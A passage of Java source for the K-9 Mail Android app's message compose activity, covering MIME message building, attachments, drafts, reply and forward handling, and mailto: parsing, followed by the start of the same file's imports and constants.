else { setTitle(mSubjectView.getText().toString()); } } public void onFocusChange(View view, boolean focused) { if (!focused) { updateTitle(); } } private void addAddresses(MultiAutoCompleteTextView view, Address[] addresses) { if (addresses == null) { return; } for (Address address : addresses) { addAddress(view, address); } } private void addAddress(MultiAutoCompleteTextView view, Address address) { view.append(address + ", "); } private Address[] getAddresses(MultiAutoCompleteTextView view) { Address[] addresses = Address.parseUnencoded(view.getText().toString().trim()); return addresses; } private String buildText(boolean appendSig) { /* * Build the Body that will contain the text of the message. We'll decide where to * include it later. */ String text = mMessageContentView.getText().toString(); if (appendSig && mAccount.isSignatureBeforeQuotedText()) { text = appendSignature(text); } if (mQuotedTextBar.getVisibility() == View.VISIBLE) { text += "\n" + mQuotedText.getText().toString(); } if (appendSig && mAccount.isSignatureBeforeQuotedText() == false) { text = appendSignature(text); } return text; } private MimeMessage createMessage(boolean appendSig) throws MessagingException { MimeMessage message = new MimeMessage(); message.addSentDate(new Date()); Address from = new Address(mIdentity.getEmail(), mIdentity.getName()); message.setFrom(from); message.setRecipients(RecipientType.TO, getAddresses(mToView)); message.setRecipients(RecipientType.CC, getAddresses(mCcView)); message.setRecipients(RecipientType.BCC, getAddresses(mBccView)); message.setSubject(mSubjectView.getText().toString()); message.setHeader("X-User-Agent", getString(R.string.message_header_mua)); final String replyTo = mIdentity.getReplyTo(); if (replyTo != null) { message.setReplyTo(new Address[] { new Address(replyTo) }); } if (mInReplyTo != null) { message.setInReplyTo(mInReplyTo); } if (mReferences != null) { message.setReferences(mReferences); } String text = null; if (mCrypto.getEncryptedData() != null) { text = mCrypto.getEncryptedData(); } else { text = buildText(appendSig); } TextBody body = new TextBody(text); if (mAttachments.getChildCount() > 0) { /* * The message has attachments that need to be included. First we add the part * containing the text that will be sent and then we include each attachment. */ MimeMultipart mp; mp = new MimeMultipart(); mp.addBodyPart(new MimeBodyPart(body, "text/plain")); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { Attachment attachment = (Attachment) mAttachments.getChildAt(i).getTag(); MimeBodyPart bp = new MimeBodyPart( new LocalStore.LocalAttachmentBody(attachment.uri, getApplication())); /* * Correctly encode the filename here. Otherwise the whole * header value (all parameters at once) will be encoded by * MimeHeader.writeTo(). */ bp.addHeader(MimeHeader.HEADER_CONTENT_TYPE, String.format("%s;\n name=\"%s\"", attachment.contentType, EncoderUtil.encodeIfNecessary(attachment.name, EncoderUtil.Usage.WORD_ENTITY, 7))); bp.addHeader(MimeHeader.HEADER_CONTENT_TRANSFER_ENCODING, "base64"); /* * TODO: Oh the joys of MIME... * * From RFC 2183 (The Content-Disposition Header Field): * "Parameter values longer than 78 characters, or which * contain non-ASCII characters, MUST be encoded as specified * in [RFC 2184]." * * Example: * * Content-Type: application/x-stuff * title*1*=us-ascii'en'This%20is%20even%20more%20 * title*2*=%2A%2A%2Afun%2A%2A%2A%20 * title*3="isn't it!" */ bp.addHeader(MimeHeader.HEADER_CONTENT_DISPOSITION, String.format( "attachment;\n filename=\"%s\";\n size=%d", attachment.name, attachment.size)); mp.addBodyPart(bp); } message.setBody(mp); } else { /* * No attachments to include, just stick the text body in the message and call * it good. */ message.setBody(body); } return message; } private String appendSignature(String text) { if (mIdentity.getSignatureUse()) { String signature = mSignatureView.getText().toString(); if (signature != null && !signature.contentEquals("")) { text += "\n" + signature; } } return text; } private void sendMessage() { new SendMessageTask().execute(); } private void saveMessage() { new SaveMessageTask().execute(); } private void saveIfNeeded() { if (!mDraftNeedsSaving || mPreventDraftSaving || mCrypto.hasEncryptionKeys()) { return; } mDraftNeedsSaving = false; saveMessage(); } public void onEncryptionKeySelectionDone() { if (mCrypto.hasEncryptionKeys()) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } public void onEncryptDone() { if (mCrypto.getEncryptedData() != null) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } private void onSend() { if (getAddresses(mToView).length == 0 && getAddresses(mCcView).length == 0 && getAddresses(mBccView).length == 0) { mToView.setError(getString(R.string.message_compose_error_no_recipients)); Toast.makeText(this, getString(R.string.message_compose_error_no_recipients), Toast.LENGTH_LONG).show(); return; } if (mEncryptCheckbox.isChecked() && !mCrypto.hasEncryptionKeys()) { // key selection before encryption String emails = ""; Address[][] addresses = new Address[][] { getAddresses(mToView), getAddresses(mCcView), getAddresses(mBccView) }; for (Address[] addressArray : addresses) { for (Address address : addressArray) { if (emails.length() != 0) { emails += ","; } emails += address.getAddress(); } } if (emails.length() != 0) { emails += ","; } emails += mIdentity.getEmail(); mPreventDraftSaving = true; if (!mCrypto.selectEncryptionKeys(MessageCompose.this, emails)) { mPreventDraftSaving = false; } return; } if (mCrypto.hasEncryptionKeys() || mCrypto.hasSignatureKey()) { if (mCrypto.getEncryptedData() == null) { String text = buildText(true); mPreventDraftSaving = true; if (!mCrypto.encrypt(this, text)) { mPreventDraftSaving = false; } return; } } sendMessage(); mDraftNeedsSaving = false; finish(); } private void onDiscard() { if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } mHandler.sendEmptyMessage(MSG_DISCARDED_DRAFT); mDraftNeedsSaving = false; finish(); } private void onSave() { mDraftNeedsSaving = true; saveIfNeeded(); finish(); } private void onAddCcBcc() { mCcView.setVisibility(View.VISIBLE); mBccView.setVisibility(View.VISIBLE); } /** * Kick off a picker for whatever kind of MIME types we'll accept and let Android take over. */ private void onAddAttachment() { if (K9.isGalleryBuggy()) { if (K9.useGalleryBugWorkaround()) { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_use_workaround), Toast.LENGTH_LONG).show(); } else { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_buggy_gallery), Toast.LENGTH_LONG).show(); } } onAddAttachment2(K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES[0]); } /** * Kick off a picker for the specified MIME type and let Android take over. */ private void onAddAttachment2(final String mime_type) { if (mCrypto.isAvailable(this)) { Toast.makeText(this, R.string.attachment_encryption_unsupported, Toast.LENGTH_LONG).show(); } Intent i = new Intent(Intent.ACTION_GET_CONTENT); i.addCategory(Intent.CATEGORY_OPENABLE); i.setType(mime_type); startActivityForResult(Intent.createChooser(i, null), ACTIVITY_REQUEST_PICK_ATTACHMENT); } private void addAttachment(Uri uri) { addAttachment(uri, -1, null); } private void addAttachment(Uri uri, int size, String name) { ContentResolver contentResolver = getContentResolver(); Attachment attachment = new Attachment(); attachment.name = name; attachment.size = size; attachment.uri = uri; if (attachment.size == -1 || attachment.name == null) { Cursor metadataCursor = contentResolver.query(uri, new String[] { OpenableColumns.DISPLAY_NAME, OpenableColumns.SIZE }, null, null, null); if (metadataCursor != null) { try { if (metadataCursor.moveToFirst()) { if (attachment.name == null) { attachment.name = metadataCursor.getString(0); } if (attachment.size == -1) { attachment.size = metadataCursor.getInt(1); Log.v(K9.LOG_TAG, "size: " + attachment.size); } } } finally { metadataCursor.close(); } } } if (attachment.name == null) { attachment.name = uri.getLastPathSegment(); } String contentType = contentResolver.getType(uri); if (contentType == null) { contentType = MimeUtility.getMimeTypeByExtension(attachment.name); } attachment.contentType = contentType; if (attachment.size<=0) { String uriString = uri.toString(); if (uriString.startsWith("file://")) { Log.v(K9.LOG_TAG, uriString.substring("file://".length())); File f = new File(uriString.substring("file://".length())); attachment.size = f.length(); } else { Log.v(K9.LOG_TAG, "Not a file: " + uriString); } } else { Log.v(K9.LOG_TAG, "old attachment.size: " + attachment.size); } Log.v(K9.LOG_TAG, "new attachment.size: " + attachment.size); View view = getLayoutInflater().inflate(R.layout.message_compose_attachment, mAttachments, false); TextView nameView = (TextView)view.findViewById(R.id.attachment_name); ImageButton delete = (ImageButton)view.findViewById(R.id.attachment_delete); nameView.setText(attachment.name); delete.setOnClickListener(this); delete.setTag(view); view.setTag(attachment); mAttachments.addView(view); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { // if a CryptoSystem activity is returning, then mPreventDraftSaving was set to true mPreventDraftSaving = false; if (mCrypto.onActivityResult(this, requestCode, resultCode, data)) { return; } if (resultCode != RESULT_OK) return; if (data == null) { return; } switch (requestCode) { case ACTIVITY_REQUEST_PICK_ATTACHMENT: addAttachment(data.getData()); mDraftNeedsSaving = true; break; case ACTIVITY_CHOOSE_IDENTITY: onIdentityChosen(data); break; case ACTIVITY_CHOOSE_ACCOUNT: onAccountChosen(data); break; } } private void onAccountChosen(final Intent intent) { final Bundle extras = intent.getExtras(); final String uuid = extras.getString(ChooseAccount.EXTRA_ACCOUNT); final Identity identity = (Identity) extras.getSerializable(ChooseAccount.EXTRA_IDENTITY); final Account account = Preferences.getPreferences(this).getAccount(uuid); if (!mAccount.equals(account)) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Switching account from " + mAccount + " to " + account); } // on draft edit, make sure we don't keep previous message UID if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { mMessageReference = null; } // test whether there is something to save if (mDraftNeedsSaving || (mDraftUid != null)) { final String previousDraftUid = mDraftUid; final Account previousAccount = mAccount; // make current message appear as new mDraftUid = null; // actual account switch mAccount = account; if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, saving new draft in new account"); } saveMessage(); if (previousDraftUid != null) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, deleting draft from previous account: " + previousDraftUid); } MessagingController.getInstance(getApplication()).deleteDraft(previousAccount, previousDraftUid); } } else { mAccount = account; } // not sure how to handle mFolder, mSourceMessage? } switchToIdentity(identity); } private void onIdentityChosen(Intent intent) { Bundle bundle = intent.getExtras();; switchToIdentity((Identity)bundle.getSerializable(ChooseIdentity.EXTRA_IDENTITY)); } private void switchToIdentity(Identity identity) { mIdentity = identity; mIdentityChanged = true; mDraftNeedsSaving = true; updateFrom(); updateSignature(); } private void updateFrom() { if (mIdentityChanged) { mFromView.setVisibility(View.VISIBLE); } mFromView.setText(getString(R.string.message_view_from_format, mIdentity.getName(), mIdentity.getEmail())); } private void updateSignature() { if (mIdentity.getSignatureUse()) { mSignatureView.setText(mIdentity.getSignature()); mSignatureView.setVisibility(View.VISIBLE); } else { mSignatureView.setVisibility(View.GONE); } } public void onClick(View view) { switch (view.getId()) { case R.id.attachment_delete: /* * The view is the delete button, and we have previously set the tag of * the delete button to the view that owns it. We don't use parent because the * view is very complex and could change in the future. */ mAttachments.removeView((View) view.getTag()); mDraftNeedsSaving = true; break; case R.id.quoted_text_delete: mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mDraftNeedsSaving = true; break; } } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case R.id.send: mCrypto.setEncryptionKeys(null); onSend(); break; case R.id.save: onSave(); break; case R.id.discard: onDiscard(); break; case R.id.add_cc_bcc: onAddCcBcc(); break; case R.id.add_attachment: onAddAttachment(); break; case R.id.add_attachment_image: onAddAttachment2("image/*"); break; case R.id.add_attachment_video: onAddAttachment2("video/*"); break; case R.id.choose_identity: onChooseIdentity(); break; default: return super.onOptionsItemSelected(item); } return true; } private void onChooseIdentity() { // keep things simple: trigger account choice only if there are more // than 1 account if (Preferences.getPreferences(this).getAccounts().length > 1) { final Intent intent = new Intent(this, ChooseAccount.class); intent.putExtra(ChooseAccount.EXTRA_ACCOUNT, mAccount.getUuid()); intent.putExtra(ChooseAccount.EXTRA_IDENTITY, mIdentity); startActivityForResult(intent, ACTIVITY_CHOOSE_ACCOUNT); } else if (mAccount.getIdentities().size() > 1) { Intent intent = new Intent(this, ChooseIdentity.class); intent.putExtra(ChooseIdentity.EXTRA_ACCOUNT, mAccount.getUuid()); startActivityForResult(intent, ACTIVITY_CHOOSE_IDENTITY); } else { Toast.makeText(this, getString(R.string.no_identities), Toast.LENGTH_LONG).show(); } } @Override public boolean onCreateOptionsMenu(Menu menu) { super.onCreateOptionsMenu(menu); getMenuInflater().inflate(R.menu.message_compose_option, menu); /* * Show the menu items "Add attachment (Image)" and "Add attachment (Video)" * if the work-around for the Gallery bug is enabled (see Issue 1186). */ int found = 0; for (int i = menu.size() - 1; i >= 0; i--) { MenuItem item = menu.getItem(i); int id = item.getItemId(); if ((id == R.id.add_attachment_image) || (id == R.id.add_attachment_video)) { item.setVisible(K9.useGalleryBugWorkaround()); found++; } // We found all the menu items we were looking for. So stop here. if (found == 2) break; } return true; } @Override public void onBackPressed() { // This will be called either automatically for you on 2.0 // or later, or by the code above on earlier versions of the // platform. if (mDraftNeedsSaving) { showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE); } else { finish(); } } @Override public Dialog onCreateDialog(int id) { switch (id) { case DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE: return new AlertDialog.Builder(this) .setTitle(R.string.save_or_discard_draft_message_dlg_title) .setMessage(R.string.save_or_discard_draft_message_instructions_fmt) .setPositiveButton(R.string.save_draft_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onSave(); } }) .setNegativeButton(R.string.discard_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onDiscard(); } }) .create(); } return super.onCreateDialog(id); } @Override public boolean onKeyDown(int keyCode, KeyEvent event) { if ( // TODO - when we move to android 2.0, uncomment this. // android.os.Build.VERSION.SDK_INT < android.os.Build.VERSION_CODES.ECLAIR && keyCode == KeyEvent.KEYCODE_BACK && event.getRepeatCount() == 0 && K9.manageBack()) { // Take care of calling this method on earlier versions of // the platform where it doesn't exist. onBackPressed(); return true; } return super.onKeyDown(keyCode, event); } /** * Returns true if all attachments were able to be attached, otherwise returns false. */ private boolean loadAttachments(Part part, int depth) throws MessagingException { if (part.getBody() instanceof Multipart) { Multipart mp = (Multipart) part.getBody(); boolean ret = true; for (int i = 0, count = mp.getCount(); i < count; i++) { if (!loadAttachments(mp.getBodyPart(i), depth + 1)) { ret = false; } } return ret; } else { String contentType = MimeUtility.unfoldAndDecode(part.getContentType()); String name = MimeUtility.getHeaderParameter(contentType, "name"); if (name != null) { Body body = part.getBody(); if (body != null && body instanceof LocalAttachmentBody) { final Uri uri = ((LocalAttachmentBody) body).getContentUri(); mHandler.post(new Runnable() { public void run() { addAttachment(uri); } }); } else { return false; } } return true; } } /** * Pull out the parts of the now loaded source message and apply them to the new message * depending on the type of message being composed. * @param message */ private void processSourceMessage(Message message) { String action = getIntent().getAction(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("re:")) { mSubjectView.setText("Re: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } /* * If a reply-to was included with the message use that, otherwise use the from * or sender address. */ Address[] replyToAddresses; if (message.getReplyTo().length > 0) { addAddresses(mToView, replyToAddresses = message.getReplyTo()); } else { addAddresses(mToView, replyToAddresses = message.getFrom()); } if (message.getMessageId() != null && message.getMessageId().length() > 0) { String messageId = message.getMessageId(); mInReplyTo = messageId; if (message.getReferences() != null && message.getReferences().length > 0) { StringBuffer buffy = new StringBuffer(); for (int i=0; i < message.getReferences().length; i++) buffy.append(message.getReferences()[i]); mReferences = buffy.toString() + " " + mInReplyTo; } else { mReferences = mInReplyTo; } } else { if (K9.DEBUG) Log.d(K9.LOG_TAG, "could not get Message-ID."); } Part part = MimeUtility.findFirstPartByMimeType(mSourceMessage, "text/plain"); if (part != null || mSourceMessageBody != null) { String quotedText = String.format( getString(R.string.message_compose_reply_header_fmt), Address.toString(mSourceMessage.getFrom())); final String prefix = mAccount.getQuotePrefix(); // "$" and "\" in the quote prefix have to be escaped for // the replaceAll() invocation. final String escapedPrefix = prefix.replaceAll("(\\\\|\\$)", "\\\\$1"); if (mSourceMessageBody != null) { quotedText += mSourceMessageBody.replaceAll("(?m)^", escapedPrefix); } else { quotedText += MimeUtility.getTextFromPart(part).replaceAll( "(?m)^", escapedPrefix); } quotedText = quotedText.replaceAll("\\\r", ""); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } if (ACTION_REPLY_ALL.equals(action) || ACTION_REPLY.equals(action)) { Identity useIdentity = null; for (Address address : message.getRecipients(RecipientType.TO)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } if (useIdentity == null) { if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } } } if (useIdentity != null) { Identity defaultIdentity = mAccount.getIdentity(0); if (useIdentity != defaultIdentity) { switchToIdentity(useIdentity); } } } if (ACTION_REPLY_ALL.equals(action)) { for (Address address : message.getRecipients(RecipientType.TO)) { if (!mAccount.isAnIdentity(address)) { addAddress(mToView, address); } } if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { if (!mAccount.isAnIdentity(address) && !Utility.arrayContains(replyToAddresses, address)) { addAddress(mCcView, address); } } mCcView.setVisibility(View.VISIBLE); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. */ } } else if (ACTION_FORWARD.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("fwd:")) { mSubjectView.setText("Fwd: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part == null) { part = MimeUtility.findFirstPartByMimeType(message, "text/html"); } if (part != null || mSourceMessageBody != null) { String quotedText = mSourceMessageBody; if (quotedText == null) { quotedText = MimeUtility.getTextFromPart(part); } if (quotedText != null) { String text = String.format( getString(R.string.message_compose_fwd_header_fmt), mSourceMessage.getSubject(), Address.toString(mSourceMessage.getFrom()), Address.toString( mSourceMessage.getRecipients(RecipientType.TO)), Address.toString( mSourceMessage.getRecipients(RecipientType.CC))); quotedText = quotedText.replaceAll("\\\r", ""); text += quotedText; mQuotedText.setText(text); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } } if (!mSourceMessageProcessed) { if (!loadAttachments(message, 0)) { mHandler.sendEmptyMessage(MSG_SKIPPED_ATTACHMENTS); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. */ } } else if (ACTION_EDIT_DRAFT.equals(action)) { try { mDraftUid = message.getUid(); mSubjectView.setText(message.getSubject()); addAddresses(mToView, message.getRecipients(RecipientType.TO)); if (message.getRecipients(RecipientType.CC).length > 0) { addAddresses(mCcView, message.getRecipients(RecipientType.CC)); mCcView.setVisibility(View.VISIBLE); } if (message.getRecipients(RecipientType.BCC).length > 0) { addAddresses(mBccView, message.getRecipients(RecipientType.BCC)); mBccView.setVisibility(View.VISIBLE); } // Read In-Reply-To header from draft final String[] inReplyTo = message.getHeader("In-Reply-To"); if ((inReplyTo != null) && (inReplyTo.length >= 1)) { mInReplyTo = inReplyTo[0]; } // Read References header from draft final String[] references = message.getHeader("References"); if ((references != null) && (references.length >= 1)) { mReferences = references[0]; } if (!mSourceMessageProcessed) { loadAttachments(message, 0); } Integer bodyLength = null; String[] k9identities = message.getHeader(K9.K9MAIL_IDENTITY); if (k9identities != null && k9identities.length > 0) { String k9identity = k9identities[0]; if (k9identity != null) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Got a saved identity: " + k9identity); StringTokenizer tokens = new StringTokenizer(k9identity, ":", false); String bodyLengthS = null; String name = null; String email = null; String signature = null; boolean signatureUse = message.getFolder().getAccount().getSignatureUse(); if (tokens.hasMoreTokens()) { bodyLengthS = Utility.base64Decode(tokens.nextToken()); try { bodyLength = Integer.parseInt(bodyLengthS); } catch (Exception e) { Log.e(K9.LOG_TAG, "Unable to parse bodyLength '" + bodyLengthS + "'"); } } if (tokens.hasMoreTokens()) { signatureUse = true; signature = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { name = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { email = Utility.base64Decode(tokens.nextToken()); } Identity newIdentity = new Identity(); newIdentity.setSignatureUse(signatureUse); if (signature != null) { newIdentity.setSignature(signature); mSignatureChanged = true; } else { newIdentity.setSignature(mIdentity.getSignature()); } if (name != null) { newIdentity.setName(name); mIdentityChanged = true; } else { newIdentity.setName(mIdentity.getName()); } if (email != null) { newIdentity.setEmail(email); mIdentityChanged = true; } else { newIdentity.setEmail(mIdentity.getEmail()); } mIdentity = newIdentity; updateSignature(); updateFrom(); } } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part != null) { String text = MimeUtility.getTextFromPart(part); if (bodyLength != null && bodyLength + 1 < text.length()) // + 1 to get rid of the newline we added when saving the draft { String bodyText = text.substring(0, bodyLength); String quotedText = text.substring(bodyLength + 1, text.length()); mMessageContentView.setText(bodyText); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } else { mMessageContentView.setText(text); } } } catch (MessagingException me) { // TODO } } mSourceMessageProcessed = true; mDraftNeedsSaving = false; } class Listener extends MessagingListener { @Override public void loadMessageForViewStarted(Account account, String folder, String uid) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_ON); } @Override public void loadMessageForViewFinished(Account account, String folder, String uid, Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); } @Override public void loadMessageForViewBodyAvailable(Account account, String folder, String uid, final Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mSourceMessage = message; runOnUiThread(new Runnable() { public void run() { processSourceMessage(message); } }); } @Override public void loadMessageForViewFailed(Account account, String folder, String uid, Throwable t) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); // TODO show network error } @Override public void messageUidChanged(Account account, String folder, String oldUid, String newUid) { //TODO: is this really necessary here? mDraftUid is update after the call to MessagingController.saveDraft() // Track UID changes of the draft message if (account.equals(mAccount) && folder.equals(mAccount.getDraftsFolderName()) && oldUid.equals(mDraftUid)) { mDraftUid = newUid; } // Track UID changes of the source message if (mMessageReference != null) { final Account sourceAccount = Preferences.getPreferences(MessageCompose.this).getAccount(mMessageReference.accountUuid); final String sourceFolder = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; if (account.equals(sourceAccount) && (folder.equals(sourceFolder))) { if (oldUid.equals(sourceMessageUid)) { mMessageReference.uid = newUid; } if ((mSourceMessage != null) && (oldUid.equals(mSourceMessage.getUid()))) { mSourceMessage.setUid(newUid); } } } } } private String decode(String s) throws UnsupportedEncodingException { return URLDecoder.decode(s, "UTF-8"); } /** * When we are launched with an intent that includes a mailto: URI, we can actually * gather quite a few of our message fields from it. * * @mailToString the href (which must start with "mailto:"). */ private void initializeFromMailTo(String mailToString) { // Chop up everything between mailto: and ? to find recipients int index = mailToString.indexOf("?"); int length = "mailto".length() + 1; String to; try { // Extract the recipient after mailto: if (index == -1) { to = decode(mailToString.substring(length)); } else { to = decode(mailToString.substring(length, index)); } mToView.setText(to); } catch (UnsupportedEncodingException e) { Log.e(K9.LOG_TAG, e.getMessage() + " while decoding '" + mailToString + "'"); } // Extract the other parameters // We need to disguise this string as a URI in order to parse it Uri uri = Uri.parse("foo://" + mailToString); String addressList; addressList = ""; List<String> cc = uri.getQueryParameters("cc"); for (String address : cc) { addressList += address + ","; } mCcView.setText(addressList); addressList = ""; List<String> bcc = uri.getQueryParameters("bcc"); for (String address : bcc) { addressList += address + ","; } mBccView.setText(addressList); List<String> subject = uri.getQueryParameters("subject"); if (subject.size() > 0) { mSubjectView.setText(subject.get(0)); } List<String> body = uri.getQueryParameters("body"); if (body.size() > 0) { mMessageContentView.setText(body.get(0)); } } private class SendMessageTask extends AsyncTask<Void, Void, Void> { @Override protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(true); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } MessagingController.getInstance(getApplication()).sendMessage(mAccount, message, null); if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } return null; } } private class SaveMessageTask extends AsyncTask<Void, Void, Void> { @Override protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(false); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } /* * Save a draft */ if (mDraftUid != null) { message.setUid(mDraftUid); } else if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { /* * We're saving a previously saved draft, so update the new message's uid * to the old message's uid. */ message.setUid(mMessageReference.uid); } String k9identity = Utility.base64Encode("" + mMessageContentView.getText().toString().length()); if (mIdentityChanged || mSignatureChanged) { String signature = mSignatureView.getText().toString(); k9identity += ":" + Utility.base64Encode(signature); if (mIdentityChanged) { String name = mIdentity.getName(); String email = mIdentity.getEmail(); k9identity += ":" + Utility.base64Encode(name) + ":" + Utility.base64Encode(email); } } if (K9.DEBUG) Log.d(K9.LOG_TAG, "Saving identity: " + k9identity); message.addHeader(K9.K9MAIL_IDENTITY, k9identity); Message draftMessage = MessagingController.getInstance(getApplication()).saveDraft(mAccount, message); mDraftUid = draftMessage.getUid(); // Don't display the toast if the user is just changing the orientation if ((getChangingConfigurations() & ActivityInfo.CONFIG_ORIENTATION) == 0) { mHandler.sendEmptyMessage(MSG_SAVED_DRAFT); } return null; } } }
src/com/fsck/k9/activity/MessageCompose.java
package com.fsck.k9.activity; import java.io.File; import java.io.Serializable; import java.io.UnsupportedEncodingException; import java.net.URLDecoder; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.StringTokenizer; import org.apache.james.mime4j.codec.EncoderUtil; import android.app.AlertDialog; import android.app.Dialog; import android.content.ContentResolver; import android.content.Context; import android.content.DialogInterface; import android.content.Intent; import android.content.pm.ActivityInfo; import android.database.Cursor; import android.net.Uri; import android.os.AsyncTask; import android.os.Bundle; import android.os.Handler; import android.os.Parcelable; import android.provider.OpenableColumns; import android.text.TextWatcher; import android.text.util.Rfc822Tokenizer; import android.util.Log; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.view.View.OnClickListener; import android.view.View.OnFocusChangeListener; import android.view.Window; import android.widget.AutoCompleteTextView.Validator; import android.widget.Button; import android.widget.CheckBox; import android.widget.EditText; import android.widget.ImageButton; import android.widget.LinearLayout; import android.widget.MultiAutoCompleteTextView; import android.widget.TextView; import android.widget.Toast; import com.fsck.k9.Account; import com.fsck.k9.EmailAddressAdapter; import com.fsck.k9.EmailAddressValidator; import com.fsck.k9.Identity; import com.fsck.k9.K9; import com.fsck.k9.Preferences; import com.fsck.k9.R; import com.fsck.k9.controller.MessagingController; import com.fsck.k9.controller.MessagingListener; import com.fsck.k9.crypto.CryptoProvider; import com.fsck.k9.helper.Utility; import com.fsck.k9.mail.Address; import com.fsck.k9.mail.Body; import com.fsck.k9.mail.Flag; import com.fsck.k9.mail.Message; import com.fsck.k9.mail.Message.RecipientType; import com.fsck.k9.mail.MessagingException; import com.fsck.k9.mail.Multipart; import com.fsck.k9.mail.Part; import com.fsck.k9.mail.internet.MimeBodyPart; import com.fsck.k9.mail.internet.MimeHeader; import com.fsck.k9.mail.internet.MimeMessage; import com.fsck.k9.mail.internet.MimeMultipart; import com.fsck.k9.mail.internet.MimeUtility; import com.fsck.k9.mail.internet.TextBody; import com.fsck.k9.mail.store.LocalStore; import com.fsck.k9.mail.store.LocalStore.LocalAttachmentBody; public class MessageCompose extends K9Activity implements OnClickListener, OnFocusChangeListener { private static final int DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE = 1; private static final String ACTION_REPLY = "com.fsck.k9.intent.action.REPLY"; private static final String ACTION_REPLY_ALL = "com.fsck.k9.intent.action.REPLY_ALL"; private static final String ACTION_FORWARD = "com.fsck.k9.intent.action.FORWARD"; private static final String ACTION_EDIT_DRAFT = "com.fsck.k9.intent.action.EDIT_DRAFT"; private static final String EXTRA_ACCOUNT = "account"; private static final String EXTRA_MESSAGE_BODY = "messageBody"; private static final String EXTRA_MESSAGE_REFERENCE = "message_reference"; private static final String STATE_KEY_ATTACHMENTS = "com.fsck.k9.activity.MessageCompose.attachments"; private static final String STATE_KEY_CC_SHOWN = "com.fsck.k9.activity.MessageCompose.ccShown"; private static final String STATE_KEY_BCC_SHOWN = "com.fsck.k9.activity.MessageCompose.bccShown"; private static final String STATE_KEY_QUOTED_TEXT_SHOWN = "com.fsck.k9.activity.MessageCompose.quotedTextShown"; private static final String STATE_KEY_SOURCE_MESSAGE_PROCED = "com.fsck.k9.activity.MessageCompose.stateKeySourceMessageProced"; private static final String STATE_KEY_DRAFT_UID = "com.fsck.k9.activity.MessageCompose.draftUid"; private static final String STATE_IDENTITY_CHANGED = "com.fsck.k9.activity.MessageCompose.identityChanged"; private static final String STATE_IDENTITY = "com.fsck.k9.activity.MessageCompose.identity"; private static final String STATE_CRYPTO = "crypto"; private static final String STATE_IN_REPLY_TO = "com.fsck.k9.activity.MessageCompose.inReplyTo"; private static final String STATE_REFERENCES = "com.fsck.k9.activity.MessageCompose.references"; private static final int MSG_PROGRESS_ON = 1; private static final int MSG_PROGRESS_OFF = 2; private static final int MSG_UPDATE_TITLE = 3; private static final int MSG_SKIPPED_ATTACHMENTS = 4; private 